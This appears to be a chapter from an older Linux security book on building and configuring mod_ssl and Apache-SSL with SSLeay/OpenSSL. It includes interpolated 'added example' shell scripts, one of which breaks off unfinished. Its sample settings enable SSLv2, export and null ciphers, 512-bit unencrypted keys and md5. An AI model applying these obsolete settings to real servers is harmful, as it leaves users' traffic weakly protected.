Apache 1.3.0 by merging the old mod_ssl 1.x with the newer Apache-SSL 1.18. From this 
point on, mod_ssl lived its own life as mod_ssl v2. The first publicly released version was 
mod_ssl 2.0.0 from August 10th, 1998. 


The mod_ssl package 


...provides strong cryptography for the Apache (v1.3) Web server via the Secure Socket Layer 
(SSL v2/v3) and Transport Layer Security (TLS v1) protocols by the help of the excellent 
SSL/TLS implementation library OpenSSL from Eric A. Young and Tim Hudson. 


NOTE 


As I'll soon explain, folks sometimes confuse mod_ssl with ApacheSSL. This is understandable, 
as they share roots. However, mod_ssl is a module, whereas ApacheSSL is Apache internally 
modified to support SSL. 





Apache Distributions and mod_ssl 


mod_ssl ships with Apache 2.0+. If you download a source-based distribution (the 
preferred method), you'll find it in http-version/modules/ssl, which should 
contain the files enumerated in Table 15.1. 


TABLE 15.1 mod_ssl Core Source Files 





File                    Function 

config.m4               Autoconf stub for the Apache config mechanism 
Makefile.in             Makefile template for Unix platform 
mod_ssl.c               Main source file containing API structures 
mod_ssl.h               Common header file of mod_ssl 
README                  This file is self-explanatory 
ssl_engine_config.c     Module configuration handling 
ssl_engine_dh.c         DSA/DH support 
ssl_engine_ds.c         Data structures 
ssl_engine_ext.c        Extensions to other Apache parts 
ssl_engine_init.c       Module initialization 
ssl_engine_io.c         I/O support 
ssl_engine_kernel.c     SSL engine kernel 
ssl_engine_log.c        Logfile support 
ssl_engine_mutex.c      Mutual exclusion support 
ssl_engine_pphrase.c    Pass-phrase handling 
ssl_engine_rand.c       PRNG support 
ssl_engine_vars.c       Variable expansion support 


TABLE 15.1 Continued 

File                    Function 

ssl_expr.c              Expression handling main source 
ssl_expr.h              Expression handling common header 
ssl_expr_eval.c         Expression machine evaluation 
ssl_expr_parse.c        Expression parser automaton (pre-generated) 
ssl_expr_parse.h        Expression parser header (pre-generated) 
ssl_expr_parse.y        Expression parser source 
ssl_expr_scan.c         Expression scanner automaton (pre-generated) 
ssl_expr_scan.l         Expression scanner source 
ssl_scache.c            Session cache abstraction layer 
ssl_scache_dbm.c        Session cache via DBM file 
ssl_scache_shmcb.c      Session cache via shared memory cyclic buffer 
ssl_scache_shmht.c      Session cache via shared memory hash table 
ssl_util.c              Utility functions 
ssl_util_ssl.c          The OpenSSL companion source 
ssl_util_ssl.h          The OpenSSL companion header 
ssl_util_table.c        The hash table library source 
ssl_util_table.h        The hash table library header 





Functions that reside within the aforementioned files include the following (xxxx is 
the version number): 

• ap_xxxx()—Apache API function 
• ssl_xxxx()—mod_ssl function 
• SSL_xxxx()—OpenSSL function (SSL library) 
• OpenSSL_xxxx()—OpenSSL function (SSL library) 
• X509_xxxx()—OpenSSL function (Crypto library) 
• PEM_xxxx()—OpenSSL function (Crypto library) 
• EVP_xxxx()—OpenSSL function (Crypto library) 
• RSA_xxxx()—OpenSSL function (Crypto library) 


Finally, mod_ssl uses several data structures: 

• server_rec—Apache Virtual Server 
• conn_rec—Apache Connection 
• BUFF—Apache Connection Buffer 


CHAPTER 15 Apache/SSL 


• request_rec—Apache Request 
• SSLModConfig—mod_ssl Global Module Configuration 
• SSLSrvConfig—mod_ssl Virtual Server Configuration 
• SSLDirConfig—mod_ssl Directory Configuration 
• SSL_CTX—OpenSSL Context 
• SSL_METHOD—OpenSSL Protocol Method 
• SSL_CIPHER—OpenSSL Cipher 
• SSL_SESSION—OpenSSL Session 
• SSL—OpenSSL Connection 
• BIO—OpenSSL Connection Buffer 
• SSLFilterRec—mod_ssl Filter Context 


Installing mod_ssl 


To derive a working mod_ssl configuration from source code (other than for Apache 
2.0, as I’ll soon explain), obtain these packages: 


• apache_1.3.24.tar.gz, available at http://httpd.apache.org/dist/httpd/ 


• mod_ssl-2.8.8-1.3.24.tar.gz or higher, available at 
ftp://ftp.modssl.org/source/ 


• openssl-0.9.6c.tar.gz or higher, available at 
ftp://ftp.openssl.org/source/ 


Next, unpack these archives: 


$ gzip -d -c apache_1.3.24.tar.gz | tar xvf - 
$ gzip -d -c mod_ssl-2.8.8-1.3.24.tar.gz | tar xvf - 
$ gzip -d -c openssl-0.9.6c.tar.gz | tar xvf - 


The next phase is important because of sequencing. First, build OpenSSL: 


$ cd openssl-0.9.6c 
$ ./config 
$ make 




Next, build Apache and compile in OpenSSL support: 


$ cd mod_ssl-2.8.8-1.3.24 
$ ./configure \ 
--with-apache=../apache_1.3.24 \ 
--with-ssl=../openssl-0.9.6c \ 
--prefix=/usr/local/apache 
$ cd .. 
$ cd apache_1.3.24 
$ make 
$ make certificate 
$ make install 


Finally, start the server with SSL enabled and test it: 


$ /usr/local/apache/bin/httpd -DSSL 
$ netscape https://www.your-web-host.net/ 


Installation is a relatively simple procedure. Next, you must establish your 
configuration. 


Using Your New mod_ssl Configuration 
mod_ssl supports many directives. Table 15.2 summarizes them and their functions. 


TABLE 15.2 mod_ssl Directives 


Directive Function 





SSLCACertificateFile      Use the SSLCACertificateFile directive to specify a file that 
                          contains not one but several certificates. 

SSLCACertificatePath      Use the SSLCACertificatePath directive to specify from what 
                          certificate authorities you'll accept a client's certificate. 

SSLCARevocationFile       This points to a file where you store the Certificate Revocation Lists 
                          (CRL) of Certification Authorities (CA) clients. 

SSLCARevocationPath       This points to the path where you store the Certificate Revocation 
                          Lists file of Certification Authorities (CA) clients. 

SSLCertificateFile        Use the SSLCertificateFile directive to specify the location of 
                          your single certificate file (*.pem). 

SSLCertificateKeyFile     Use the SSLCertificateKeyFile directive to specify the location of 
                          your private key file. 

SSLCipherSuite            This enables you to specify the cipher or ciphers your server should 
                          support (kRSA, kDHr, kDHd, kEDH, aNULL, aRSA, aDSS, aDH, 
                          eNULL, DES, 3DES, RC4, RC2, IDEA, MD5, SHA1, SHA, SSLv2, 
                          SSLv3, TLSv1, EXP, EXPORT40, EXPORT56, LOW, MEDIUM, HIGH, 
                          RSA, DH, EDH, ADH, DSS, or NULL). 
TABLE 15.2 Continued 

Directive                 Function 

SSLEngine                 This enables you to turn the SSLEngine on or off. Why would you 
                          need this if your server supports SSL? Here’s why: Perhaps only one 
                          area of your site needs SSL. Hence, embedding this directive in a 
                          virtual host block enables SSL for that virtual host only. 

SSLLog                    This enables you to specify the path and filename of the SSL log. 

SSLLogLevel               This enables you to specify the log level that mod_ssl will use 
                          (none, error, warn, info, trace, and debug). 

SSLOptions                This directive enables you to establish certain options (backward 
                          compatibility, CGI environment variables, and so on). 

SSLPassPhraseDialog       This directive enables you to specify whether the Web administrator 
                          (usually, you) must interactively enter the passphrase or not. If 
                          not, it provides functionality to pass this process to a program or 
                          script. 

SSLProtocol               This enables you to specify what protocol to use (for example, 
                          Transport Layer Security protocol, standard SSL, and so on). 

SSLRandomSeed             This directive enables you to specify what random seed generator 
                          you’d like to use. That is, you needn’t use the default; you could 
                          use an external generator (based in your operating system), a 
                          third-party tool, or even an application of your own design. 

SSLRequire                This directive specifies a general access requirement that has to be 
                          fulfilled in order to allow access (and you can trigger requires on 
                          words, digits, regular expressions, variables, and so forth). 

SSLRequireSSL             This directive forbids access unless HTTP over SSL (that is, HTTPS) 
                          is enabled for the current connection. 

SSLSessionCache           This configures the storage type (dbm or shm hash) of the 
                          global/interprocess SSL Session Cache. 

SSLSessionCacheTimeout    Use this to specify, in seconds, the time after which a session 
                          times out. 

SSLVerifyClient           Use the SSLVerifyClient directive to set your server’s paranoia 
                          level. Levels run from 0 (no certificate at all required) to 3 (the 
                          client must present—at the least—a valid certificate). 





Here’s a typical configuration, applied to a particular directory: 


<Directory /usr/local/apache/htdocs/pearson> 

# Support all sorts of ciphers 
SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL 

# Some characteristics of the session 
SSLVerifyDepth 1 
SSLCACertificateFile conf/ssl.crt/your-company-ca.crt 
SSLOptions +FakeBasicAuth +StrictRequire 

# Make sure they're using strong SSL 
SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 

# Some rules to apply to clients who can connect 
SSLRequireSSL 
SSLRequire %{SSL_CLIENT_S_DN_O} eq "Pearson" and \ 
           %{SSL_CLIENT_S_DN_OU} in {"Editorial", "CA", "Dev"} 

# Force HTTPS 
RewriteEngine on 
RewriteCond %{REMOTE_ADDR} !^192\.168\.1\.[0-9]+$ 
RewriteCond %{HTTPS} !=on 
RewriteRule .* - [F] 

# Network Access and Basic Auth 
Satisfy any 

# Network Access Control 
Order deny,allow 
Deny from all 
Allow from www.mcp.com 

# Basic Authentication 
AuthType Basic 
AuthName "Protected Area" 
AuthUserFile conf/users.passwd 
Require valid-user 
</Directory> 


mod_ssl is very good for a quick start (and comes in binary distributions, too). 
However, perhaps you want to build your SSL host from scratch. That’s possible too, 
with Apache-SSL. 


What Is Apache-SSL? 


Apache-SSL is a secure Web server, based on Apache and SSLeay/OpenSSL. It is 
licensed under a BSD-style license, which means, in short, that you are free to use it 
for commercial or noncommercial purposes, so long as you retain the copyright 
notices. 
However, as noted in Apache-SSL’s documentation: 


There appears to be some confusion regarding Apache-SSL and mod_ssl. To set the record 
straight: mod_ssl is not a replacement for Apache-SSL—it is an alternative, in the same way 
that Apache is an alternative to Netscape/Microsoft servers, or Linux is an alternative to 
FreeBSD. It is a matter of personal choice as to which you run. mod_ssl is what is known as a 
‘split’—that is, it was originally derived from Apache-SSL, but has been extensively redeveloped 
so the code now bears little relation to the original. 


Installing Apache-SSL 


To install Apache-SSL, you'll need three things: 


• apache_1.3.22+ssl_1.45, available at 
ftp://ftp.zedz.net/pub/crypto/mirror/ftp.apache-ssl.org. 


• openssl-0.9.5a or better, available at http://www.openssl.org/, or SSLeay, 
which is available at http://www.openssl.org/ or 
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/. 


• The Apache-SSL patches, available at 
ftp://ftp.ox.ac.uk/pub/crypto/SSL/Apache-SSL/ 


In the following example, I use Apache 1.2.6 and SSLeay 0.81b. Here’s why: I know 
that this example works on several Unix platforms. Homegrown, compile-it-yourself 
Apache-SSL versions are quirky and might not come off clean on all platforms. 
(Locations of prefabbed packages are provided for the faint of heart.) The following 
example, however, will probably work with later versions (with a little effort). The 
chief exercise here is to generically demonstrate the installation process. 


Unpacking, Compiling, and Installing OpenSSL 


To unpack SSLeay, copy SSLeay-version.tar.gz to /usr/src, unzip the compressed 
file, and untar the archive: 


cp SSLeay-0.8.1b.tar.gz /usr/src
cd /usr/src
gunzip SSLeay-0.8.1b.tar.gz
tar -xvf SSLeay-0.8.1b.tar


SSLeay will extract to /usr/src/SSLeay-version/. Next, change to that directory and 
run Configure: 


cd /usr/src/SSLeay-0.8.1b
perl ./Configure linux-elf

Note that the previous example is for Linux ELF systems only. If your architecture or
target is different, start Configure without arguments and it will print a wide range
of options:


# perl ./Configure
Usage: Configure [-Dxxx] [-Lxxx] [-lxxx] os/compiler

pick os/compiler from:
BC-16                BC-32                FreeBSD              NetBSD-sparc
NetBSD-x86           SINIX-N              VC-MSDOS             VC-NT
VC-W31-16            VC-W31-32            VC-WIN16             VC-WIN32
aix-cc               aix-gcc              alpha-cc             alpha-gcc
alpha400-cc          bsdi-gcc             cc                   debug
debug-irix-cc        debug-linux-elf      dgux-R3-gcc          dgux-R4-gcc
dgux-R4-x86-gcc      dist                 gcc                  hpux-cc
hpux-gcc             hpux-kr-cc           irix-cc              irix-gcc
linux-aout           linux-elf            nextstep             purify
sco5-cc              solaris-sparc-cc     solaris-sparc-gcc    solaris-sparc-sc4
solaris-usparc-sc4   solaris-x86-gcc      sunos-cc             sunos-gcc
unixware-2.0         unixware-2.0-pentium

Note that in addition to architecture and binary targets, you can also set other 
options at the Configure command line, including 


• -DDES_PTR—Use this option to specify that during the build, you want pointer
  lookup versus arrays in the DES in crypto/des/des_locl.h.

• -DDES_RISC1—Use this option to specify a different DES_ENCRYPT macro that helps
  reduce register dependencies (a good choice for RISC architectures).

• -DNO_BF—Use this option to build SSLeay without Blowfish support.

• -DNO_DES—Use this option to build SSLeay without DES/3DES support.

• -DNO_IDEA—Use this option to build SSLeay with no IDEA support.

• -DNO_MD2—Use this option to build SSLeay without MD2 support.

• -DNO_RC2—Use this option to build SSLeay with no RC2 support.

• -DNO_RC4—Use this option to build SSLeay with no RC4 support.

• -DRSAref—Use this option to build SSLeay to use RSAref.


NOTE 





Other more obscure options also exist. For example, you can specify to use int instead of 
long in DES if need be. Check the SSLeay documentation for more information. 
After you define your architecture and options, run Configure. In response, it will
print out a brief summary of your premake configuration. Here’s an example:


[root@linux7 SSLeay-0.8.1b]# perl Configure linux-elf
CC      =gcc
CFLAG   =-DL_ENDIAN -DTERMIO -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
EX_LIBS =
BN_MULW =asm/x86-lnx.o
DES_ENC =asm/dx86-elf.o asm/cx86-elf.o
BF_ENC  =asm/bx86-elf.o
THIRTY_TWO_BIT mode
DES_PTR used
DES_RISC1 used
DES_UNROLL used
BN_LLONG mode
RC4_INDEX mode
BF_PTR2 used


I recommend clipping and pasting these values to a temporary file. Some options on 
certain systems can trigger a bad make, and you might be forced to change them later. 
It’s nice to have them handy in that event. 


Next, run make: 


make 


The make will take several minutes, but if you have ANSI C support installed, you 
shouldn’t have any problems here. You’ll know that you have a successful make 
when you see this message: 


NOTE: The OpenSSL header files have been moved from include/*.h
to include/openssl/*.h. To include OpenSSL header files, now
directives of the form
      #include <openssl/foo.h>
should be used instead of #include <foo.h>.
These new file locations allow installing the OpenSSL header
files in /usr/local/include/openssl/ and should help avoid
conflicts with other libraries.

To compile programs that use the old form <foo.h>,
usually an additional compiler option will suffice: E.g., add
      -I/usr/local/ssl/include/openssl
or
      -I/openssl-0.9.3a/include/openssl
to the CFLAGS in the Makefile of the program that you want to compile
(and leave all the original -I...'s in place!).

Please make sure that no old OpenSSL header files are around:
The include directory should now be empty except for the openssl
subdirectory.


After you verify that the make was successful, run this command: 


make rehash 


Finally, try a test, like this:

make test

Here you might encounter problems. On some systems, the optimization flags in the
Makefile will cause the test to fail. If that happens, edit the Makefile and remove the
optimization flag from the CFLAGS option line.


Depending on your system’s configuration, the relevant line will be either line 59 or 
60, whichever is not commented out: 


CFLAG= -DL_ENDIAN -DTERMIO -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized

Here is the optimization flag to remove:

-O3

After you remove the optimization flag, start again (make clean; make) and everything
should be fine.


WARNING 


On Caldera OpenLinux 1.2, even if you change the -O3 optimization flag, the make test will
fail (during the randtest procedure). Apparently, SSLeay doesn’t like 1.2’s random.





You’ll know when your make test is clean when you see this message: 


Signed certificate is in newcert.pem
newcert.pem: OK
make[1]: Leaving directory `/SSLeay-0.9.0b/test'
SSLeay 0.9.0b 29-Jun-1998
built on Wed Jun 30 01:20:01 PDT 1999
options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
C flags:gcc -DL_ENDIAN -DTERMIO -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DSHA1_ASM -DMD5_ASM -DRMD160_ASM

After you verify that your test was successful, install the package like this: 


make install 


Unpacking, Patching, and Installing Apache 


Next, copy apache_version.tar.gz to /usr/src and unpack it:

cp apache_1.2.6.tar.gz /usr/src
cd /usr/src
gunzip apache_1.2.6.tar.gz
tar -xvf apache_1.2.6.tar


Apache will unpack to /usr/src/apache_version/. After you verify that it unpacked
correctly, copy apache_version+ssl_version.tar.gz to /usr/src/apache_version and
unpack it:

cp apache_1.2.6+ssl_1.17.tar.gz /usr/src/apache_1.2.6
cd /usr/src/apache_1.2.6
gunzip apache_1.2.6+ssl_1.17.tar.gz
tar -xvf apache_1.2.6+ssl_1.17.tar
This should unpack at least the following files:

• ben.pgp.key.asc—The author’s PGP public key
• EXTRAS.SSL—Documentation on extra features
• LICENCE.SSL—The Apache-SSL license
• md5sums—MD5 checksums for these files (using md5sum)
• md5sums.asc—The author’s detached signature of md5sums
• README.SSL—A brief overview
• SECURITY—Reflections on SSL and security
• src/apache_ssl.c—An extra module for Apache
• SSLconf/conf/access.conf—An empty Apache access configuration file
• SSLconf/conf/httpd.conf—A sample httpd.conf file
• SSLconf/conf/mime.types—A sample mime.types configuration file
• SSLconf/conf/srm.conf—An empty Apache srm configuration file
• SSLpatch—A vital patch file (we’ll use it in a moment)


After verifying that the files unpacked properly (and before compiling Apache), apply 
the supplied patch, like this: 


patch -p1 < SSLpatch 
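The archive unpacked above ships its own md5sums, a detached PGP signature over them (md5sums.asc) and the author's key (ben.pgp.key.asc), so the tree can be checked before SSLpatch touches it. The script below is an added example, not code from the book or from the Apache-SSL project; it assumes GNU md5sum and patch are installed, that gpg is available for the signature step, and that DIR is the directory the book unpacks into (/usr/src/apache_1.2.6).

```shell
#!/bin/sh
# Added example (not from the book or the Apache-SSL project): verify the
# Apache-SSL distribution's own integrity data before applying SSLpatch.
# Uses the files listed above: md5sums, md5sums.asc, ben.pgp.key.asc and
# SSLpatch. Assumes GNU md5sum and patch; gpg is needed only for the
# signature step.

# verify_md5sums DIR
# Recomputes every checksum listed in DIR/md5sums. md5sum -c prints a line
# per file and returns non-zero if any file is missing or has been altered.
verify_md5sums() {
    dir=$1
    if [ ! -f "$dir/md5sums" ]; then
        echo "verify_md5sums: no md5sums file in $dir" >&2
        return 1
    fi
    ( cd "$dir" && md5sum -c md5sums )
}

# verify_signature DIR
# Checks the detached signature md5sums.asc over md5sums with the author's
# key shipped in the archive. A key that arrives inside the same tarball only
# proves the tarball is self-consistent: compare the fingerprint that
# "gpg --fingerprint" prints with one obtained out of band before trusting it.
# Returns 0 on a good signature, 2 if gpg is not installed, 1 otherwise.
verify_signature() {
    dir=$1
    if ! command -v gpg >/dev/null 2>&1; then
        echo "verify_signature: gpg not installed, signature not checked" >&2
        return 2
    fi
    gpg --import "$dir/ben.pgp.key.asc" || return 1
    gpg --verify "$dir/md5sums.asc" "$dir/md5sums" || return 1
}

# apply_ssl_patch DIR
# Runs both checks, then rehearses the patch with --dry-run so that a patch
# meant for a different Apache release fails cleanly instead of leaving a
# half-patched source tree.
apply_ssl_patch() {
    dir=$1
    verify_md5sums "$dir" || return 1
    rc=0
    verify_signature "$dir" || rc=$?
    if [ "$rc" -eq 1 ]; then
        echo "apply_ssl_patch: signature check failed, not patching" >&2
        return 1
    fi
    ( cd "$dir" && patch -p1 --dry-run < SSLpatch && patch -p1 < SSLpatch )
}
```

Run it as `apply_ssl_patch /usr/src/apache_1.2.6` in place of the bare patch command; a missing gpg only warns, a bad checksum or bad signature stops the patch.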

Next, change to /usr/src/apache-version/src/, copy Configuration.tmpl to
Configuration, and open Configuration for editing. In it, (among other possible
things) you must change the SSL_BASE variable. (This tells Apache where to find the
SSL libraries during compilation.) To change that value, open Configuration and go
to line 63. It should look like this:


#SSL_BASE= /u/ben/work/scuzzy-ssleay6 


Change this to the SSLeay source directory. For this example, I changed mine to 


SSL_BASE=/usr/src/SSLeay-0.8.1b 


When you set the SSL_BASE variable and exit, you’re ready to make Apache: 

make 

To verify that your make went smoothly, check /usr/src/apache_version/src for the 
following file: 


-rwxr-xr-x 1 root root 543482 Jan 30 04:00 httpsd
If it exists, you’re in business. Time to move on to certificate generation. 


Preparing to Generate a Certificate 
Before you can generate a certificate, you must first configure ssleay.cnf. To do so,
change to /usr/local/ssl/lib/. Here’s what the file looks like by default:


# SSLeay example configuration file.
# This is mostly being used for generation of certificate requests.
#

RANDFILE = $ENV::HOME/.rnd

####################################################################
[ ca ]
default_ca = CA_default # The default ca section

####################################################################
[ CA_default ]

dir = ./demoCA # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.

certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file

x509_extensions = x509v3_extensions # The extentions to add to the cert

default_days = 365 # how long to certify for
default_crl_days= 30 # how long before next CRL
default_md = md5 # which md to use.
preserve = no # keep passed DN ordering

# A few different ways of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :-)
policy = policy_match

# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

# For the ‘anything’ policy
# At this point in time, you must list all acceptable ‘object’
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

####################################################################
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes

[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = AU
countryName_min = 2
countryName_max = 2

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Some-State

localityName = Locality Name (eg, city)

0.organizationName = Organization Name (eg, company)
0.organizationName_default = Internet Widgits Pty Ltd

# we can do this but it is not needed normally :-)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = CryptSoft Pty Ltd

organizationalUnitName = Organizational Unit Name (eg, section)
#organizationalUnitName_default =

commonName = Common Name (eg, YOUR name)
commonName_max = 64

emailAddress = Email Address
emailAddress_max = 40

[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20

unstructuredName = An optional company name

[ x509v3_extensions ]

nsCaRevocationUrl = http://www.cryptsoft.com/ca-crl.pem
nsComment = "This is a comment"

# under ASN.1, the 0 bit would be encoded as 80
nsCertType = 0x40

#nsBaseUrl
#nsRevocationUrl
#nsRenewalUrl
#nsCaPolicyUrl
#nsSslServerName
#nsCertSequence
#nsCertExt
#nsDataType

You must determine what these values should be. (Some will be hard-coded into 
your certificate and displayed when visitors connect.) However, you can set just a 
few and define the rest in interactive mode when you generate your certificate. For 
example, you could use a brief file, such as this: 


# The following variables are defined. For this example I will
# populate the various values
[ req ]
default_bits = 512 # default number of bits to use.
default_keyfile = testkey.pem # Where to write the generated keyfile
 # if not specified.
distinguished_name = req_dn # The section that contains the
 # information about which 'object' we
 # want to put in the DN.
attributes = req_attr # The objects we want for the
 # attributes field.
encrypt_rsa_key = no # Should we encrypt newly generated
 # keys. I strongly recommend 'yes'.

####################
# The distinguished name section. For the following entries, the
# object names must exist in the SSLeay header file objects.h. If they
# do not, they will be silently ignored. The entries have the following
# format.
# <object_name> => string to prompt with
# <object_name>_default => default value for people
# <object_name>_value => Automatically use this value for this field.
# <object_name>_min => minimum number of characters for data (def. 0)
# <object_name>_max => maximum number of characters for data (def. inf.)
# All of these entries are optional except for the first one.
[ req_dn ]
countryName = Country Name (2 letter code)
countryName_default = AU

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Queensland


After you define your desired options, return to /usr/src/apache_1.2.6/src and 
issue the following command: 


make certificate 


Here, SSLeay will walk you through the process interactively: 


[root@linux7 apache_1.2.6]# cd /usr/src/apache_1.2.6/
[root@linux7 apache_1.2.6]# cd src
[root@linux7 src]# make certificate
/usr/src/SSLeay-0.8.1b/apps/ssleay req -config /usr/src/SSLeay-0.8.1b/crypto/conf/ssleay.cnf \
        -new -x509 -nodes -out ../SSLconf/conf/httpsd.pem \
        -keyout ../SSLconf/conf/httpsd.pem; \
ln -sf ../SSLconf/conf/httpsd.pem \
        ../SSLconf/conf/`/usr/src/SSLeay-0.8.1b/apps/ssleay x509 -noout -hash < ../SSLconf/conf/httpsd.pem`.0
Using configuration from /usr/src/SSLeay-0.8.1b/crypto/conf/ssleay.cnf
Generating a 512 bit RSA private key
.........+++++
........+++++
writing new private key to '../SSLconf/conf/httpsd.pem'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name
or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Queensland]:California
Locality Name (eg, city) []:Malibu
Organization Name (eg, company) [Mincom Pty Ltd]:Macmillan Publishing
Organizational Unit Name (eg, section) [MTR]:SAMS
Common Name (eg, YOUR name) []:Anonymous
Email Address []:maxlinsec@altavista.net


This will generate your certificate (httpsd.pem) and place it here:


/usr/src/apache_1.2.6/SSLconf/conf/httpsd.pem 


You’re nearly done. What remains is to configure httpsd’s startup files. 


Configuring httpsd Startup Files 


You'll find sample configuration files (access.conf-dist, httpd.conf-dist, and 
srm.conf-dist) in /usr/src/apache_version/conf. These files are actually empty in 
some SSLeay distributions, but don’t worry. In many respects, you can set options in 
these files precisely as you would for a normal Apache install. 


The directives and options that differ from standard Apache values point to various 
resources (like your certificate). Here’s a very lightweight example: 


ServerType standalone
Port 80
Listen 443
User webssl
Group webssl
ServerAdmin webmaster@samshacker.net
ServerRoot /var/httpd/
ErrorLog logs/error_log
TransferLog logs/access_log
PidFile logs/httpd.pid
ServerName linux7.samshacker.net
MinSpareServers 3
MaxSpareServers 20
StartServers 3
SSLCACertificatePath /var/httpd/conf
SSLCACertificateFile /var/httpd/conf/httpsd.pem
SSLCertificateFile /var/httpd/conf/httpsd.pem
SSLLogFile /var/httpd/logs/ssl.log
SSLCacheServerPort 8080
SSLCacheServerPath /usr/src/SSLeay-0.8.1b
SSLSessionCacheTimeout 10000


Note that in order for the server to find your certificates, you must specify the 
correct directory and ensure that the certificates are actually there. For example, if 
you define this as your certificate file: 


SSLCertificateFile /var/httpd/conf/httpsd.pem 


You must copy httpsd.pem from here: 


/usr/src/apache_1.2.6/SSLconf/conf/httpsd.pem 


to here: 


/var/httpd/conf/httpsd.pem 


Testing the Server 


Lastly, before installing httpsd to its final resting place and cleaning up, you should 
test your server. To do so, issue the httpsd command plus the -f flag defining your 
configuration file’s location. For example: 


httpsd -f /var/httpd/conf/httpd.conf 


or 


httpsd -f /usr/src/apache_1.2.6/conf/httpd.conf 


In response, httpsd will start up: 


./httpsd -f /usr/src/apache_1.2.6/conf/httpd.conf 
Reading certificate and key for server linux7.samshacker.net:8080 
PID 1342 


To test drive your new Apache-SSL server, crank up Netscape Communicator and 
connect to the port you assigned httpsd to. If your server is running correctly, 
Netscape will notify you with a New Site Certificate window, as in Figure 15.1. 
FIGURE 15.1 The Netscape New Site Certificate Notification window. 


Choose Next to examine details about the certificate. In response, Netscape 
Communicator will report the certificate’s owner, signer, and encryption strength, 
shown in Figure 15.2. 


FIGURE 15.2 Communicator’s report on the current certificate. 


To see expanded certificate information, choose More Info. Here, Communicator will 
display the identity, distinguished name, location, and duration of validity for the 
current certificate as shown in Figure 15.3. 


Because it doesn’t initially recognize the certificate, Communicator will next prompt 
you to accept or decline it for the current sessions (see Figure 15.4). 
FIGURE 15.3 Certificate details. 


FIGURE 15.4 Communicator requests authorization to accept the current certificate. 


If you choose to accept the certificate, Netscape will advise you that even though the 
current session will be encrypted, it might not necessarily protect you from fraud. 
And, by default, Netscape highlights the option to notify you whenever you send 
data to the server as shown in Figure 15.5. 


Finally, when you accept the certificate, Netscape will notify you that the current 
session is being encrypted, but that you can later decide not to trust the certificate 
(see Figure 15.6). 
FIGURE 15.5 Communicator’s advisory statement on fraud. 


FIGURE 15.6 Communicator’s final advisory about the current certificate and session. 


Configuration Notes 

Fine-tuning your Apache-SSL configuration works in precisely the same manner as
traditional Apache. In fact, from a configuration viewpoint, Apache-SSL takes
nothing away, but instead adds several features. For example, in addition to
traditional Apache environment variables, Apache-SSL supports SSL-centric environment
variables. These are summarized in Table 15.3.
TABLE 15.3 Apache-SSL Environment Variables

Field                      Significance

HTTPS                      The HTTPS variable specifies whether the server is using HTTPS.

HTTPS_CIPHER               The HTTPS_CIPHER environment variable specifies which cipher is
                           being used.

HTTPS_KEYSIZE              The HTTPS_KEYSIZE environment variable specifies the session key
                           size.

HTTPS_SECRETKEYSIZE        The HTTPS_SECRETKEYSIZE environment variable specifies what
                           secret key size is being used.

SSL_CIPHER                 The SSL_CIPHER environment variable specifies which cipher is
                           being used.

SSL_CLIENT_<x509>          The SSL_CLIENT_<x509> environment variable specifies a component
                           of the client’s DN.

SSL_CLIENT_CERT            The SSL_CLIENT_CERT environment variable specifies the Base64
                           encoding of the client’s certificate.

SSL_CLIENT_CERT_CHAIN_n    The SSL_CLIENT_CERT_CHAIN_n environment variable specifies the
                           Base64 encoding of the client’s certificate chain.

SSL_CLIENT_DN              The SSL_CLIENT_DN environment variable specifies the DN
                           (Distinguished Name) in the client’s certificate.

SSL_CLIENT_I_<x509>        The SSL_CLIENT_I_<x509> environment variable specifies a
                           component of the client’s issuer DN.

SSL_CLIENT_I_DN            The SSL_CLIENT_I_DN environment variable specifies the DN of the
                           client’s certificate issuer.

SSL_PROTOCOL_VERSION       The SSL_PROTOCOL_VERSION environment variable specifies what
                           SSL version is being used.

SSL_SERVER_<x509>          The SSL_SERVER_<x509> environment variable specifies a component
                           of the server’s DN.

SSL_SERVER_DN              The SSL_SERVER_DN environment variable specifies the DN in the
                           server’s certificate.

SSL_SERVER_I_<x509>        The SSL_SERVER_I_<x509> environment variable specifies a
                           component of the server’s certificate issuer’s DN.

SSL_SERVER_I_DN            The SSL_SERVER_I_DN environment variable specifies the server’s
                           certificate issuer’s DN.

SSL_SSLEAY_VERSION         The SSL_SSLEAY_VERSION environment variable specifies what
                           SSLeay version is being used.

You can display these environment variables from CGI scripts in the usual way: 


print "$ENV{'SSL_CLIENT_CERT'}\n";
print "$ENV{'SSL_CIPHER'}\n";
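Beyond printing them, a CGI script can use the same variables to refuse requests that do not meet its own policy before it handles anything sensitive. The check below is an added example, not code from the book or from Apache-SSL; the expected issuer DN, the key-size threshold and the sample requests are constructed values, and the harness function exists only so the check can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the book or Apache-SSL): a start-up check for a
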